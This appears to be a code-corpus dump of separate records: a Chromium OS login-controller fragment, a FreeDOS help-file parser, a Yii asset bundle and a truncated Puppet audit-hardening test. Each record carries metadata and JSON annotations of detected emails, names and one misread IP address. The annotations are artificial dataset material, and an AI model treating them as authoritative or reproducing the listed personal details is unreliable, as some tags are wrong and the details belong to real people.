LoginPerformer::Delegate* delegate = this;
if (login_performer_delegate_.get())
delegate = login_performer_delegate_.get();
// Only one instance of LoginPerformer should exist at a time.
login_performer_.reset(NULL);
login_performer_.reset(new LoginPerformer(delegate));
}
is_login_in_progress_ = true;
if (gaia::ExtractDomainName(user_context.username) ==
UserManager::kLocallyManagedUserDomain) {
login_performer_->LoginAsLocallyManagedUser(
UserContext(user_context.username,
user_context.password,
std::string())); // auth_code
} else {
login_performer_->PerformLogin(user_context, auth_mode);
}
AccessibilityManager::Get()->MaybeSpeak(
l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNING_IN));
}
void ExistingUserController::LoginAsRetailModeUser() {
// Stop the auto-login timer when attempting login.
StopPublicSessionAutoLoginTimer();
// Disable clicking on other windows.
login_display_->SetUIEnabled(false);
// TODO(rkc): Add a CHECK to make sure retail mode logins are allowed once
// the enterprise policy wiring is done for retail mode.
// Only one instance of LoginPerformer should exist at a time.
login_performer_.reset(NULL);
login_performer_.reset(new LoginPerformer(this));
is_login_in_progress_ = true;
login_performer_->LoginRetailMode();
AccessibilityManager::Get()->MaybeSpeak(
l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_DEMOUSER));
}
void ExistingUserController::LoginAsGuest() {
if (is_login_in_progress_ || UserManager::Get()->IsUserLoggedIn())
return;
// Stop the auto-login timer when attempting login.
StopPublicSessionAutoLoginTimer();
// Disable clicking on other windows.
login_display_->SetUIEnabled(false);
CrosSettingsProvider::TrustedStatus status =
cros_settings_->PrepareTrustedValues(
base::Bind(&ExistingUserController::LoginAsGuest,
weak_factory_.GetWeakPtr()));
// Must not proceed without signature verification.
if (status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
login_display_->ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, 1,
HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
// Reenable clicking on other windows and status area.
login_display_->SetUIEnabled(true);
StartPublicSessionAutoLoginTimer();
display_email_.clear();
return;
} else if (status != CrosSettingsProvider::TRUSTED) {
// Value of AllowNewUser setting is still not verified.
// Another attempt will be invoked after verification completion.
return;
}
bool allow_guest;
cros_settings_->GetBoolean(kAccountsPrefAllowGuest, &allow_guest);
if (!allow_guest) {
// Disallowed. The UI should normally not show the guest pod but if for some
// reason this has been made available to the user here is the time to tell
// this nicely.
login_display_->ShowError(IDS_LOGIN_ERROR_WHITELIST, 1,
HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
// Reenable clicking on other windows and status area.
login_display_->SetUIEnabled(true);
StartPublicSessionAutoLoginTimer();
display_email_.clear();
return;
}
// Only one instance of LoginPerformer should exist at a time.
login_performer_.reset(NULL);
login_performer_.reset(new LoginPerformer(this));
is_login_in_progress_ = true;
login_performer_->LoginOffTheRecord();
AccessibilityManager::Get()->MaybeSpeak(
l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_OFFRECORD));
}
void ExistingUserController::MigrateUserData(const std::string& old_password) {
// LoginPerformer instance has state of the user so it should exist.
if (login_performer_.get())
login_performer_->RecoverEncryptedData(old_password);
}
void ExistingUserController::LoginAsPublicAccount(
const std::string& username) {
if (is_login_in_progress_ || UserManager::Get()->IsUserLoggedIn())
return;
// Stop the auto-login timer when attempting login.
StopPublicSessionAutoLoginTimer();
// Disable clicking on other windows.
login_display_->SetUIEnabled(false);
CrosSettingsProvider::TrustedStatus status =
cros_settings_->PrepareTrustedValues(
base::Bind(&ExistingUserController::LoginAsPublicAccount,
weak_factory_.GetWeakPtr(),
username));
// If device policy is permanently unavailable, logging into public accounts
// is not possible.
if (status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
login_display_->ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, 1,
HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT);
// Re-enable clicking on other windows.
login_display_->SetUIEnabled(true);
return;
}
// If device policy is not verified yet, this function will be called again
// when verification finishes.
if (status != CrosSettingsProvider::TRUSTED)
return;
// If there is no public account with the given |username|, logging in is not
// possible.
const User* user = UserManager::Get()->FindUser(username);
if (!user || user->GetType() != User::USER_TYPE_PUBLIC_ACCOUNT) {
// Re-enable clicking on other windows.
login_display_->SetUIEnabled(true);
StartPublicSessionAutoLoginTimer();
return;
}
// Only one instance of LoginPerformer should exist at a time.
login_performer_.reset(NULL);
login_performer_.reset(new LoginPerformer(this));
is_login_in_progress_ = true;
login_performer_->LoginAsPublicAccount(username);
AccessibilityManager::Get()->MaybeSpeak(
l10n_util::GetStringUTF8(IDS_CHROMEOS_ACC_LOGIN_SIGNIN_PUBLIC_ACCOUNT));
}
void ExistingUserController::OnSigninScreenReady() {
signin_screen_ready_ = true;
StartPublicSessionAutoLoginTimer();
}
void ExistingUserController::OnUserSelected(const std::string& username) {
login_performer_.reset(NULL);
num_login_attempts_ = 0;
}
void ExistingUserController::OnStartEnterpriseEnrollment() {
DeviceSettingsService::Get()->GetOwnershipStatusAsync(
base::Bind(&ExistingUserController::OnEnrollmentOwnershipCheckCompleted,
weak_factory_.GetWeakPtr()));
}
void ExistingUserController::OnStartKioskEnableScreen() {
KioskAppManager::Get()->GetConsumerKioskModeStatus(
base::Bind(&ExistingUserController::OnConsumerKioskModeCheckCompleted,
weak_factory_.GetWeakPtr()));
}
void ExistingUserController::OnStartDeviceReset() {
ShowResetScreen();
}
void ExistingUserController::OnStartKioskAutolaunchScreen() {
ShowKioskAutolaunchScreen();
}
void ExistingUserController::ResyncUserData() {
// LoginPerformer instance has state of the user so it should exist.
if (login_performer_.get())
login_performer_->ResyncEncryptedData();
}
void ExistingUserController::SetDisplayEmail(const std::string& email) {
display_email_ = email;
}
void ExistingUserController::ShowWrongHWIDScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kWrongHWIDScreenName, params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::Signout() {
NOTREACHED();
}
void ExistingUserController::OnConsumerKioskModeCheckCompleted(
KioskAppManager::ConsumerKioskModeStatus status) {
if (status == KioskAppManager::CONSUMER_KIOSK_MODE_CONFIGURABLE)
ShowKioskEnableScreen();
}
void ExistingUserController::OnEnrollmentOwnershipCheckCompleted(
DeviceSettingsService::OwnershipStatus status,
bool current_user_is_owner) {
if (status == DeviceSettingsService::OWNERSHIP_NONE) {
ShowEnrollmentScreen(false, std::string());
} else if (status == DeviceSettingsService::OWNERSHIP_TAKEN) {
// On a device that is already owned we might want to allow users to
// re-enroll if the policy information is invalid.
CrosSettingsProvider::TrustedStatus trusted_status =
CrosSettings::Get()->PrepareTrustedValues(
base::Bind(
&ExistingUserController::OnEnrollmentOwnershipCheckCompleted,
weak_factory_.GetWeakPtr(),
status, current_user_is_owner));
if (trusted_status == CrosSettingsProvider::PERMANENTLY_UNTRUSTED) {
ShowEnrollmentScreen(false, std::string());
}
} else {
// OwnershipService::GetStatusAsync is supposed to return either
// OWNERSHIP_NONE or OWNERSHIP_TAKEN.
NOTREACHED();
}
}
void ExistingUserController::ShowEnrollmentScreen(bool is_auto_enrollment,
const std::string& user) {
scoped_ptr<DictionaryValue> params;
if (is_auto_enrollment) {
params.reset(new DictionaryValue());
params->SetBoolean("is_auto_enrollment", true);
params->SetString("user", user);
}
host_->StartWizard(WizardController::kEnrollmentScreenName,
params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowResetScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kResetScreenName, params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowKioskEnableScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kKioskEnableScreenName, params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowKioskAutolaunchScreen() {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(WizardController::kKioskAutolaunchScreenName,
params.Pass());
login_display_->OnFadeOut();
}
void ExistingUserController::ShowTPMError() {
login_display_->SetUIEnabled(false);
login_display_->ShowErrorScreen(LoginDisplay::TPM_ERROR);
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, LoginPerformer::Delegate implementation:
//
void ExistingUserController::OnLoginFailure(const LoginFailure& failure) {
is_login_in_progress_ = false;
offline_failed_ = true;
guest_mode_url_ = GURL::EmptyGURL();
std::string error = failure.GetErrorString();
if (UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
HandleLoginFailure(failure)) {
return;
}
if (failure.reason() == LoginFailure::OWNER_REQUIRED) {
ShowError(IDS_LOGIN_ERROR_OWNER_REQUIRED, error);
content::BrowserThread::PostDelayedTask(
content::BrowserThread::UI, FROM_HERE,
base::Bind(&SessionManagerClient::StopSession,
base::Unretained(DBusThreadManager::Get()->
GetSessionManagerClient())),
base::TimeDelta::FromMilliseconds(kSafeModeRestartUiDelayMs));
} else if (failure.reason() == LoginFailure::TPM_ERROR) {
ShowTPMError();
} else if (!online_succeeded_for_.empty()) {
ShowGaiaPasswordChanged(online_succeeded_for_);
} else {
// Check networking after trying to login in case user is
// cached locally or the local admin account.
bool is_known_user =
UserManager::Get()->IsKnownUser(last_login_attempt_username_);
if (!ConnectivityStateHelper::Get()->IsConnected()) {
if (is_known_user)
ShowError(IDS_LOGIN_ERROR_AUTHENTICATING, error);
else
ShowError(IDS_LOGIN_ERROR_OFFLINE_FAILED_NETWORK_NOT_CONNECTED, error);
} else {
// TODO(nkostylev): Cleanup rest of ClientLogin related code.
if (failure.reason() == LoginFailure::NETWORK_AUTH_FAILED &&
failure.error().state() ==
GoogleServiceAuthError::HOSTED_NOT_ALLOWED) {
ShowError(IDS_LOGIN_ERROR_AUTHENTICATING_HOSTED, error);
} else {
if (!is_known_user)
ShowError(IDS_LOGIN_ERROR_AUTHENTICATING_NEW, error);
else
ShowError(IDS_LOGIN_ERROR_AUTHENTICATING, error);
}
}
// Reenable clicking on other windows and status area.
login_display_->SetUIEnabled(true);
login_display_->ClearAndEnablePassword();
StartPublicSessionAutoLoginTimer();
}
// Reset user flow to default, so that special flow will not affect next
// attempt.
UserManager::Get()->ResetUserFlow(last_login_attempt_username_);
if (login_status_consumer_)
login_status_consumer_->OnLoginFailure(failure);
// Clear the recorded displayed email so it won't affect any future attempts.
display_email_.clear();
}
void ExistingUserController::OnLoginSuccess(
const UserContext& user_context,
bool pending_requests,
bool using_oauth) {
is_login_in_progress_ = false;
offline_failed_ = false;
login_display_->set_signin_completed(true);
StopPublicSessionAutoLoginTimer();
bool has_cookies =
login_performer_->auth_mode() == LoginPerformer::AUTH_MODE_EXTENSION &&
user_context.auth_code.empty();
// Login performer will be gone so cache this value to use
// once profile is loaded.
password_changed_ = login_performer_->password_changed();
// LoginPerformer instance will delete itself once online auth result is OK.
// In case of failure it'll bring up ScreenLock and ask for
// correct password/display error message.
// Even in case when following online,offline protocol and returning
// requests_pending = false, let LoginPerformer delete itself.
login_performer_->set_delegate(NULL);
ignore_result(login_performer_.release());
// Will call OnProfilePrepared() in the end.
LoginUtils::Get()->PrepareProfile(user_context,
display_email_,
using_oauth,
has_cookies,
false, // Start session for user.
this);
display_email_.clear();
// Notify LoginDisplay to allow it provide visual feedback to user.
login_display_->OnLoginSuccess(user_context.username);
}
void ExistingUserController::OnProfilePrepared(Profile* profile) {
OptionallyShowReleaseNotes(profile);
// Reenable clicking on other windows and status area.
login_display_->SetUIEnabled(true);
if (UserManager::Get()->IsCurrentUserNew() &&
!UserManager::Get()->GetCurrentUserFlow()->ShouldSkipPostLoginScreens() &&
!WizardController::default_controller()->skip_post_login_screens()) {
// Don't specify start URLs if the administrator has configured the start
// URLs via policy.
if (!SessionStartupPref::TypeIsManaged(profile->GetPrefs()))
InitializeStartUrls();
#ifndef NDEBUG
if (CommandLine::ForCurrentProcess()->HasSwitch(
chromeos::switches::kOobeSkipPostLogin)) {
LoginUtils::Get()->DoBrowserLaunch(profile, host_);
host_ = NULL;
} else {
#endif
// Mark the device as registered., i.e. the second part of OOBE as
// completed.
if (!StartupUtils::IsDeviceRegistered())
StartupUtils::MarkDeviceRegistered();
ActivateWizard(WizardController::kTermsOfServiceScreenName);
#ifndef NDEBUG
}
#endif
} else {
LoginUtils::Get()->DoBrowserLaunch(profile, host_);
host_ = NULL;
}
// Inform |login_status_consumer_| about successful login. Set most
// parameters to empty since they're not needed.
if (login_status_consumer_) {
login_status_consumer_->OnLoginSuccess(UserContext(),
false, // pending_requests
false); // using_oauth
}
login_display_->OnFadeOut();
}
void ExistingUserController::OnOffTheRecordLoginSuccess() {
is_login_in_progress_ = false;
offline_failed_ = false;
// Mark the device as registered., i.e. the second part of OOBE as completed.
if (!StartupUtils::IsDeviceRegistered())
StartupUtils::MarkDeviceRegistered();
LoginUtils::Get()->CompleteOffTheRecordLogin(guest_mode_url_);
if (login_status_consumer_)
login_status_consumer_->OnOffTheRecordLoginSuccess();
}
void ExistingUserController::OnPasswordChangeDetected() {
is_login_in_progress_ = false;
offline_failed_ = false;
// Must not proceed without signature verification.
if (CrosSettingsProvider::TRUSTED != cros_settings_->PrepareTrustedValues(
base::Bind(&ExistingUserController::OnPasswordChangeDetected,
weak_factory_.GetWeakPtr()))) {
// Value of owner email is still not verified.
// Another attempt will be invoked after verification completion.
return;
}
if (UserManager::Get()->GetUserFlow(last_login_attempt_username_)->
HandlePasswordChangeDetected()) {
return;
}
// True if user has already made an attempt to enter old password and failed.
bool show_invalid_old_password_error =
login_performer_->password_changed_callback_count() > 1;
// Note: We allow owner using "full sync" mode which will recreate
// cryptohome and deal with owner private key being lost. This also allows
// us to recover from a lost owner password/homedir.
// TODO(gspencer): We shouldn't have to erase stateful data when
// doing this. See http://crosbug.com/9115 http://crosbug.com/7792
login_display_->ShowPasswordChangedDialog(show_invalid_old_password_error);
if (login_status_consumer_)
login_status_consumer_->OnPasswordChangeDetected();
display_email_.clear();
}
void ExistingUserController::WhiteListCheckFailed(const std::string& email) {
is_login_in_progress_ = false;
offline_failed_ = false;
ShowError(IDS_LOGIN_ERROR_WHITELIST, email);
// Reenable clicking on other windows and status area.
login_display_->SetUIEnabled(true);
login_display_->ShowSigninUI(email);
if (login_status_consumer_) {
login_status_consumer_->OnLoginFailure(LoginFailure(
LoginFailure::WHITELIST_CHECK_FAILED));
}
display_email_.clear();
StartPublicSessionAutoLoginTimer();
}
void ExistingUserController::PolicyLoadFailed() {
ShowError(IDS_LOGIN_ERROR_OWNER_KEY_LOST, "");
// Reenable clicking on other windows and status area.
is_login_in_progress_ = false;
offline_failed_ = false;
login_display_->SetUIEnabled(true);
display_email_.clear();
// Policy load failure stops login attempts -- restart the timer.
StartPublicSessionAutoLoginTimer();
}
void ExistingUserController::OnOnlineChecked(const std::string& username,
bool success) {
if (success && last_login_attempt_username_ == username) {
online_succeeded_for_ = username;
// Wait for login attempt to end, if it hasn't yet.
if (offline_failed_ && !is_login_in_progress_)
ShowGaiaPasswordChanged(username);
}
}
////////////////////////////////////////////////////////////////////////////////
// ExistingUserController, private:
void ExistingUserController::ActivateWizard(const std::string& screen_name) {
scoped_ptr<DictionaryValue> params;
host_->StartWizard(screen_name, params.Pass());
}
void ExistingUserController::ConfigurePublicSessionAutoLogin() {
std::string auto_login_account_id;
cros_settings_->GetString(kAccountsPrefDeviceLocalAccountAutoLoginId,
&auto_login_account_id);
const std::vector<policy::DeviceLocalAccount> device_local_accounts =
policy::GetDeviceLocalAccounts(cros_settings_);
public_session_auto_login_username_.clear();
for (std::vector<policy::DeviceLocalAccount>::const_iterator
it = device_local_accounts.begin();
it != device_local_accounts.end(); ++it) {
if (it->account_id == auto_login_account_id) {
public_session_auto_login_username_ = it->user_id;
break;
}
}
const User* user =
UserManager::Get()->FindUser(public_session_auto_login_username_);
if (!user || user->GetType() != User::USER_TYPE_PUBLIC_ACCOUNT)
public_session_auto_login_username_.clear();
if (!cros_settings_->GetInteger(
kAccountsPrefDeviceLocalAccountAutoLoginDelay,
&public_session_auto_login_delay_)) {
public_session_auto_login_delay_ = 0;
}
if (!public_session_auto_login_username_.empty())
StartPublicSessionAutoLoginTimer();
else
StopPublicSessionAutoLoginTimer();
}
void ExistingUserController::ResetPublicSessionAutoLoginTimer() {
// Only restart the auto-login timer if it's already running.
if (auto_login_timer_ && auto_login_timer_->IsRunning()) {
StopPublicSessionAutoLoginTimer();
StartPublicSessionAutoLoginTimer();
}
}
void ExistingUserController::OnPublicSessionAutoLoginTimerFire() {
CHECK(signin_screen_ready_ &&
!is_login_in_progress_ &&
!public_session_auto_login_username_.empty());
LoginAsPublicAccount(public_session_auto_login_username_);
}
void ExistingUserController::StopPublicSessionAutoLoginTimer() {
if (auto_login_timer_)
auto_login_timer_->Stop();
}
void ExistingUserController::StartPublicSessionAutoLoginTimer() {
if (!signin_screen_ready_ ||
is_login_in_progress_ ||
public_session_auto_login_username_.empty()) {
return;
}
// Start the auto-login timer.
if (!auto_login_timer_)
auto_login_timer_.reset(new base::OneShotTimer<ExistingUserController>);
auto_login_timer_->Start(
FROM_HERE,
base::TimeDelta::FromMilliseconds(
public_session_auto_login_delay_),
base::Bind(
&ExistingUserController::OnPublicSessionAutoLoginTimerFire,
weak_factory_.GetWeakPtr()));
}
gfx::NativeWindow ExistingUserController::GetNativeWindow() const {
return host_->GetNativeWindow();
}
void ExistingUserController::InitializeStartUrls() const {
std::vector<std::string> start_urls;
const base::ListValue *urls;
bool can_show_getstarted_guide = true;
if (UserManager::Get()->IsLoggedInAsDemoUser()) {
if (CrosSettings::Get()->GetList(kStartUpUrls, &urls)) {
// The retail mode user will get start URLs from a special policy if it is
// set.
for (base::ListValue::const_iterator it = urls->begin();
it != urls->end(); ++it) {
std::string url;
if ((*it)->GetAsString(&url))
start_urls.push_back(url);
}
}
can_show_getstarted_guide = false;
// Skip the default first-run behavior for public accounts.
} else if (!UserManager::Get()->IsLoggedInAsPublicAccount()) {
if (AccessibilityManager::Get()->IsSpokenFeedbackEnabled()) {
const char* url = kChromeVoxTutorialURLPattern;
PrefService* prefs = g_browser_process->local_state();
const std::string current_locale =
StringToLowerASCII(prefs->GetString(prefs::kApplicationLocale));
std::string vox_url = base::StringPrintf(url, current_locale.c_str());
start_urls.push_back(vox_url);
can_show_getstarted_guide = false;
}
}
ServicesCustomizationDocument* customization =
ServicesCustomizationDocument::GetInstance();
if (!ServicesCustomizationDocument::WasApplied() &&
customization->IsReady()) {
// Since we don't use OEM start URL anymore, just mark as applied.
customization->ApplyCustomization();
}
// Only show getting started guide for a new user.
const bool should_show_getstarted_guide =
UserManager::Get()->IsCurrentUserNew();
if (can_show_getstarted_guide && should_show_getstarted_guide) {
// Don't open default Chrome window if we're going to launch the GS app.
// Because we dont' want the GS app to be hidden in the background.
CommandLine::ForCurrentProcess()->AppendSwitch(::switches::kSilentLaunch);
} else {
for (size_t i = 0; i < start_urls.size(); ++i) {
CommandLine::ForCurrentProcess()->AppendArg(start_urls[i]);
}
}
}
void ExistingUserController::OptionallyShowReleaseNotes(
Profile* profile) const {
// TODO(nkostylev): Fix WizardControllerFlowTest case.
if (!profile || KioskModeSettings::Get()->IsKioskModeEnabled())
return;
if (UserManager::Get()->GetCurrentUserFlow()->ShouldSkipPostLoginScreens())
return;
PrefService* prefs = profile->GetPrefs();
chrome::VersionInfo version_info;
// New users would get this info with default getting started guide.
// In password changed case 2 options are available:
// 1. Cryptohome removed, pref is gone, not yet synced, recreate
// with latest version.
// 2. Cryptohome migrated, pref is available. To simplify implementation
// update version here too. Unlikely that user signs in first time on
// the machine after update with password changed.
if (UserManager::Get()->IsCurrentUserNew() || password_changed_) {
prefs->SetString(prefs::kChromeOSReleaseNotesVersion,
version_info.Version());
return;
}
std::string prev_version_pref =
prefs->GetString(prefs::kChromeOSReleaseNotesVersion);
Version prev_version(prev_version_pref);
if (!prev_version.IsValid())
prev_version = Version("0.0.0.0");
Version current_version(version_info.Version());
if (!current_version.components().size()) {
NOTREACHED() << "Incorrect version " << current_version.GetString();
return;
}
// No "Release Notes" content yet for upgrade from M19 to later release.
if (prev_version.components()[0] >= kReleaseNotesTargetRelease)
return;
// Otherwise, trigger on major version change.
if (current_version.components()[0] > prev_version.components()[0]) {
prefs->SetString(prefs::kChromeOSReleaseNotesVersion,
current_version.GetString());
}
}
void ExistingUserController::ShowError(int error_id,
const std::string& details) {
// TODO(dpolukhin): show detailed error info. |details| string contains
// low level error info that is not localized and even is not user friendly.
// For now just ignore it because error_text contains all required information
// for end users, developers can see details string in Chrome logs.
VLOG(1) << details;
HelpAppLauncher::HelpTopic help_topic_id;
bool is_offline = !ConnectivityStateHelper::Get()->IsConnected();
switch (login_performer_->error().state()) {
case GoogleServiceAuthError::CONNECTION_FAILED:
help_topic_id = HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT_OFFLINE;
break;
case GoogleServiceAuthError::ACCOUNT_DISABLED:
help_topic_id = HelpAppLauncher::HELP_ACCOUNT_DISABLED;
break;
case GoogleServiceAuthError::HOSTED_NOT_ALLOWED:
help_topic_id = HelpAppLauncher::HELP_HOSTED_ACCOUNT;
break;
default:
help_topic_id = is_offline ?
HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT_OFFLINE :
HelpAppLauncher::HELP_CANT_ACCESS_ACCOUNT;
break;
}
login_display_->ShowError(error_id, num_login_attempts_, help_topic_id);
}
void ExistingUserController::ShowGaiaPasswordChanged(
const std::string& username) {
// Invalidate OAuth token, since it can't be correct after password is
// changed.
UserManager::Get()->SaveUserOAuthStatus(
username,
User::OAUTH2_TOKEN_STATUS_INVALID);
login_display_->SetUIEnabled(true);
login_display_->ShowGaiaPasswordChanged(username);
}
} // namespace chromeos
|
C++
|
BSD-3-Clause-No-Nuclear-License-2014
|
hujiajie/pa-chromium/chrome/browser/chromeos/login/existing_user_controller.cc
|
e692f421-f4dd-4c71-a885-684292f9dbf1
|
[{"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 42191, "end": 42198, "context": "ev_version.IsValid())\n prev_version = Version(\"0.0.0.0\");\n Version current_version(version_info.Version"}]
|
[{"tag": "IP_ADDRESS", "value": "0.0.0.0", "start": 42191, "end": 42198, "context": "ev_version.IsValid())\n prev_version = Version(\"0.0.0.0\");\n Version current_version(version_info.Version"}]
|
/*
Helpparse.c - help file parser.
Copyright (C) 2000 Imre Leber
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
If you have any questions, comments, suggestions, or fixes please
email me at: imre.leber@worldonline.be
*/
#include <stdlib.h>
#include <string.h>
#include "hlpread.h"
static size_t AmofLines;
static char* EmptyString = "";
static char** HelpSysData = NULL;
static size_t CountLines(char* RawData, size_t bufsize)
{
size_t count = 0, i = 0;
while (i < bufsize)
{
if (RawData[i] == '\r')
{
count++;
if ((i+1 < bufsize) && (RawData[i+1] == '\n')) i++;
}
else if (RawData[i] == '\n')
count++;
i++;
}
return count + 1;
}
static char* GetNextLine(char* input, char** slot, int restinbuf)
{
char* p = input;
int len;
while ((*p != '\r') && (*p != '\n') && restinbuf)
{
p++;
restinbuf--;
}
len = (int)(p - input);
if (len)
{
if ((*slot = (char*) malloc(len+1)) == NULL)
return NULL;
memcpy(*slot, input, (int)(p-input));
*((*slot) + len) = '\0';
}
else
*slot = EmptyString;
if (*(p+1) == '\n')
return p+2;
else
return p+1;
}
int ParseHelpFile(char* RawData, size_t bufsize)
{
int i, j;
char* input = RawData;
AmofLines = CountLines(RawData, bufsize);
if ((HelpSysData = (char**) malloc(AmofLines * sizeof(char*))) == NULL)
return HELPMEMINSUFFICIENT;
for (i = 0; i < AmofLines; i++)
{
input = GetNextLine(input, &HelpSysData[i], (int)(bufsize - (input - RawData)));
if (!input)
{
for (j = 0; j < i; j++)
free(HelpSysData[j]);
free(HelpSysData);
HelpSysData=0;
return HELPMEMINSUFFICIENT;
}
}
return HELPSUCCESS;
}
size_t GetHelpLineCount()
{
return AmofLines;
}
char* GetHelpLine(int line)
{
return HelpSysData[line];
}
void FreeHelpSysData()
{
int i;
if (HelpSysData)
{
for (i = 0; i < AmofLines; i++)
{
if (HelpSysData[i] != EmptyString)
free(HelpSysData[i]);
}
free(HelpSysData);
}
HelpSysData = NULL;
}
|
C
|
MPL-2.0
|
AlainODea/sdcboot/freedos/source/defrag/msdefint/helpsys/hlpparse.c
|
23003a5c-6410-408e-8ac5-50e0ca0cb732
|
[{"tag": "EMAIL", "value": "imre.leber@worldonline.be", "start": 877, "end": 902, "context": "s, suggestions, or fixes please\r\n email me at: imre.leber@worldonline.be\r\n*/\r\n\r\n#include <stdlib.h>\r\n#include <string.h>\r\n"}]
|
[{"tag": "EMAIL", "value": "imre.leber@worldonline.be", "start": 877, "end": 902, "context": "s, suggestions, or fixes please\r\n email me at: imre.leber@worldonline.be\r\n*/\r\n\r\n#include <stdlib.h>\r\n#include <string.h>\r\n"}]
|
<?php
/**
* @link http://www.yiiframework.com/
* @copyright Copyright (c) 2008 Yii Software LLC
* @license http://www.yiiframework.com/license/
*/
namespace app\assets;
use yii\web\AssetBundle;
/**
* Main application asset bundle.
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @since 2.0
*/
class IndexAsset extends AssetBundle
{
public $basePath = '@webroot';
public $baseUrl = '@web';
public $css = [
'css/site.css',
];
public $js = [
'js/globals.js',
'js/main.js',
];
public $depends = [
'yii\web\YiiAsset',
'yii\bootstrap\BootstrapAsset',
];
}
|
PHP
|
BSD-3-Clause
|
el-dorian/cottage/assets/IndexAsset.php
|
3c0c983b-d43b-4a2e-b04b-3c271cd71849
|
[{"tag": "NAME", "value": "Qiang Xue", "start": 253, "end": 262, "context": "*\n * Main application asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass Ind"}, {"tag": "EMAIL", "value": "qiang.xue@gmail.com", "start": 264, "end": 283, "context": "pplication asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass IndexAsset extends Asset"}]
|
[{"tag": "NAME", "value": "Qiang Xue", "start": 253, "end": 262, "context": "*\n * Main application asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass Ind"}, {"tag": "EMAIL", "value": "qiang.xue@gmail.com", "start": 264, "end": 283, "context": "pplication asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass IndexAsset extends Asset"}]
|
require 'spec_helper'
describe 'cis_hardening::logaudit::accounting' do
on_supported_os.each do |os, os_facts|
context "on #{os}" do
let(:facts) { os_facts }
# Check for default class
it { is_expected.to contain_class('cis_hardening::logaudit::accounting') }
# Ensure Auditing is enabled - Section 4.1.1
# Ensure that auditd is installed - Section 4.1.1.1
it {
is_expected.to contain_package('audit').with(
'ensure' => 'present',
)
}
it {
is_expected.to contain_package('audit-libs').with(
'ensure' => 'present',
)
}
# Ensure auditd service is enabled and running - Section 4.1.1.2
it {
is_expected.to contain_service('auditd').with(
'ensure' => 'running',
'enable' => true,
'hasstatus' => true,
'hasrestart' => true,
).that_requires('File[/etc/audit/audit.rules]')
}
it {
is_expected.to contain_exec('restart_auditd').with(
'path' => '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin',
'command' => '/bin/systemctl restart auditd',
).that_requires('Package[audit]')
}
# Ensure that Ensure auditing for processes that start prior to auditd is enabled - Section 4.1.1.3
it {
is_expected.to contain_file_line('pre_auditd_settings').with(
'ensure' => 'present',
'path' => '/etc/default/grub',
'line' => 'GRUB_CMDLINE_LINUX="audit=1"',
).that_requires('File[/etc/default/grub]')
}
it {
is_expected.to contain_file('/etc/audit/audit.rules').with(
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0640',
).that_requires('Package[audit]')
}
it {
is_expected.top contain_file_line('auditd_restart_enable').with(
'ensure' => 'present',
'path' => '/usr/lib/systemd/system/auditd.service',
'line' => 'RefuseManualStop=no',
'match' => '^RefuseManualStop\=',
)
}
# If you leave AuditD as-is, you'll get an error because the default is to not allow AuditD to restart. For the
# purposes of CIS hardening, you have to be able to specify options and restart the service. This changes the option
# when Puppet runs. It will only be activated once booted after the Puppet run.
# Configure Data Retention - 4.1.2
# Ensure audit log storage size is configured - Section 4.1.2.1
it {
is_expected.to contain_file_line('set_auditd_logfile_size').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'max_log_file = 1024',
'match' => '^max_log_file\ \=',
).that_notifies('Exec[restart_auditd]')
}
# Ensure that Ensure audit logs are not automatically deleted - Section 4.1.2.2
it {
is_expected.to contain_file_line('set_max_logfile_action').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'max_log_file_action = keep_logs',
'match' => '^max_log_file_action\ \=',
)
}
# Ensure system is disabled when audit logs are full - Section 4.1.2.3
it {
is_expected.to contain_file_line('full_logfile_notify_action').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'space_left_action = email',
'match' => '^space_left_action\ \=',
).that_notifies('Exec[restart_auditd]')
}
it {
is_expected.to contain_file_line('set_action_mail_account').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'action_mail_acct = root',
'match' => '^action_mail_acct\ \=',
).that_notifies('Exec[restart_auditd]')
}
it {
is_expected.to contain_file_line('set_admin_space_left_action').with(
'ensure' => 'present',
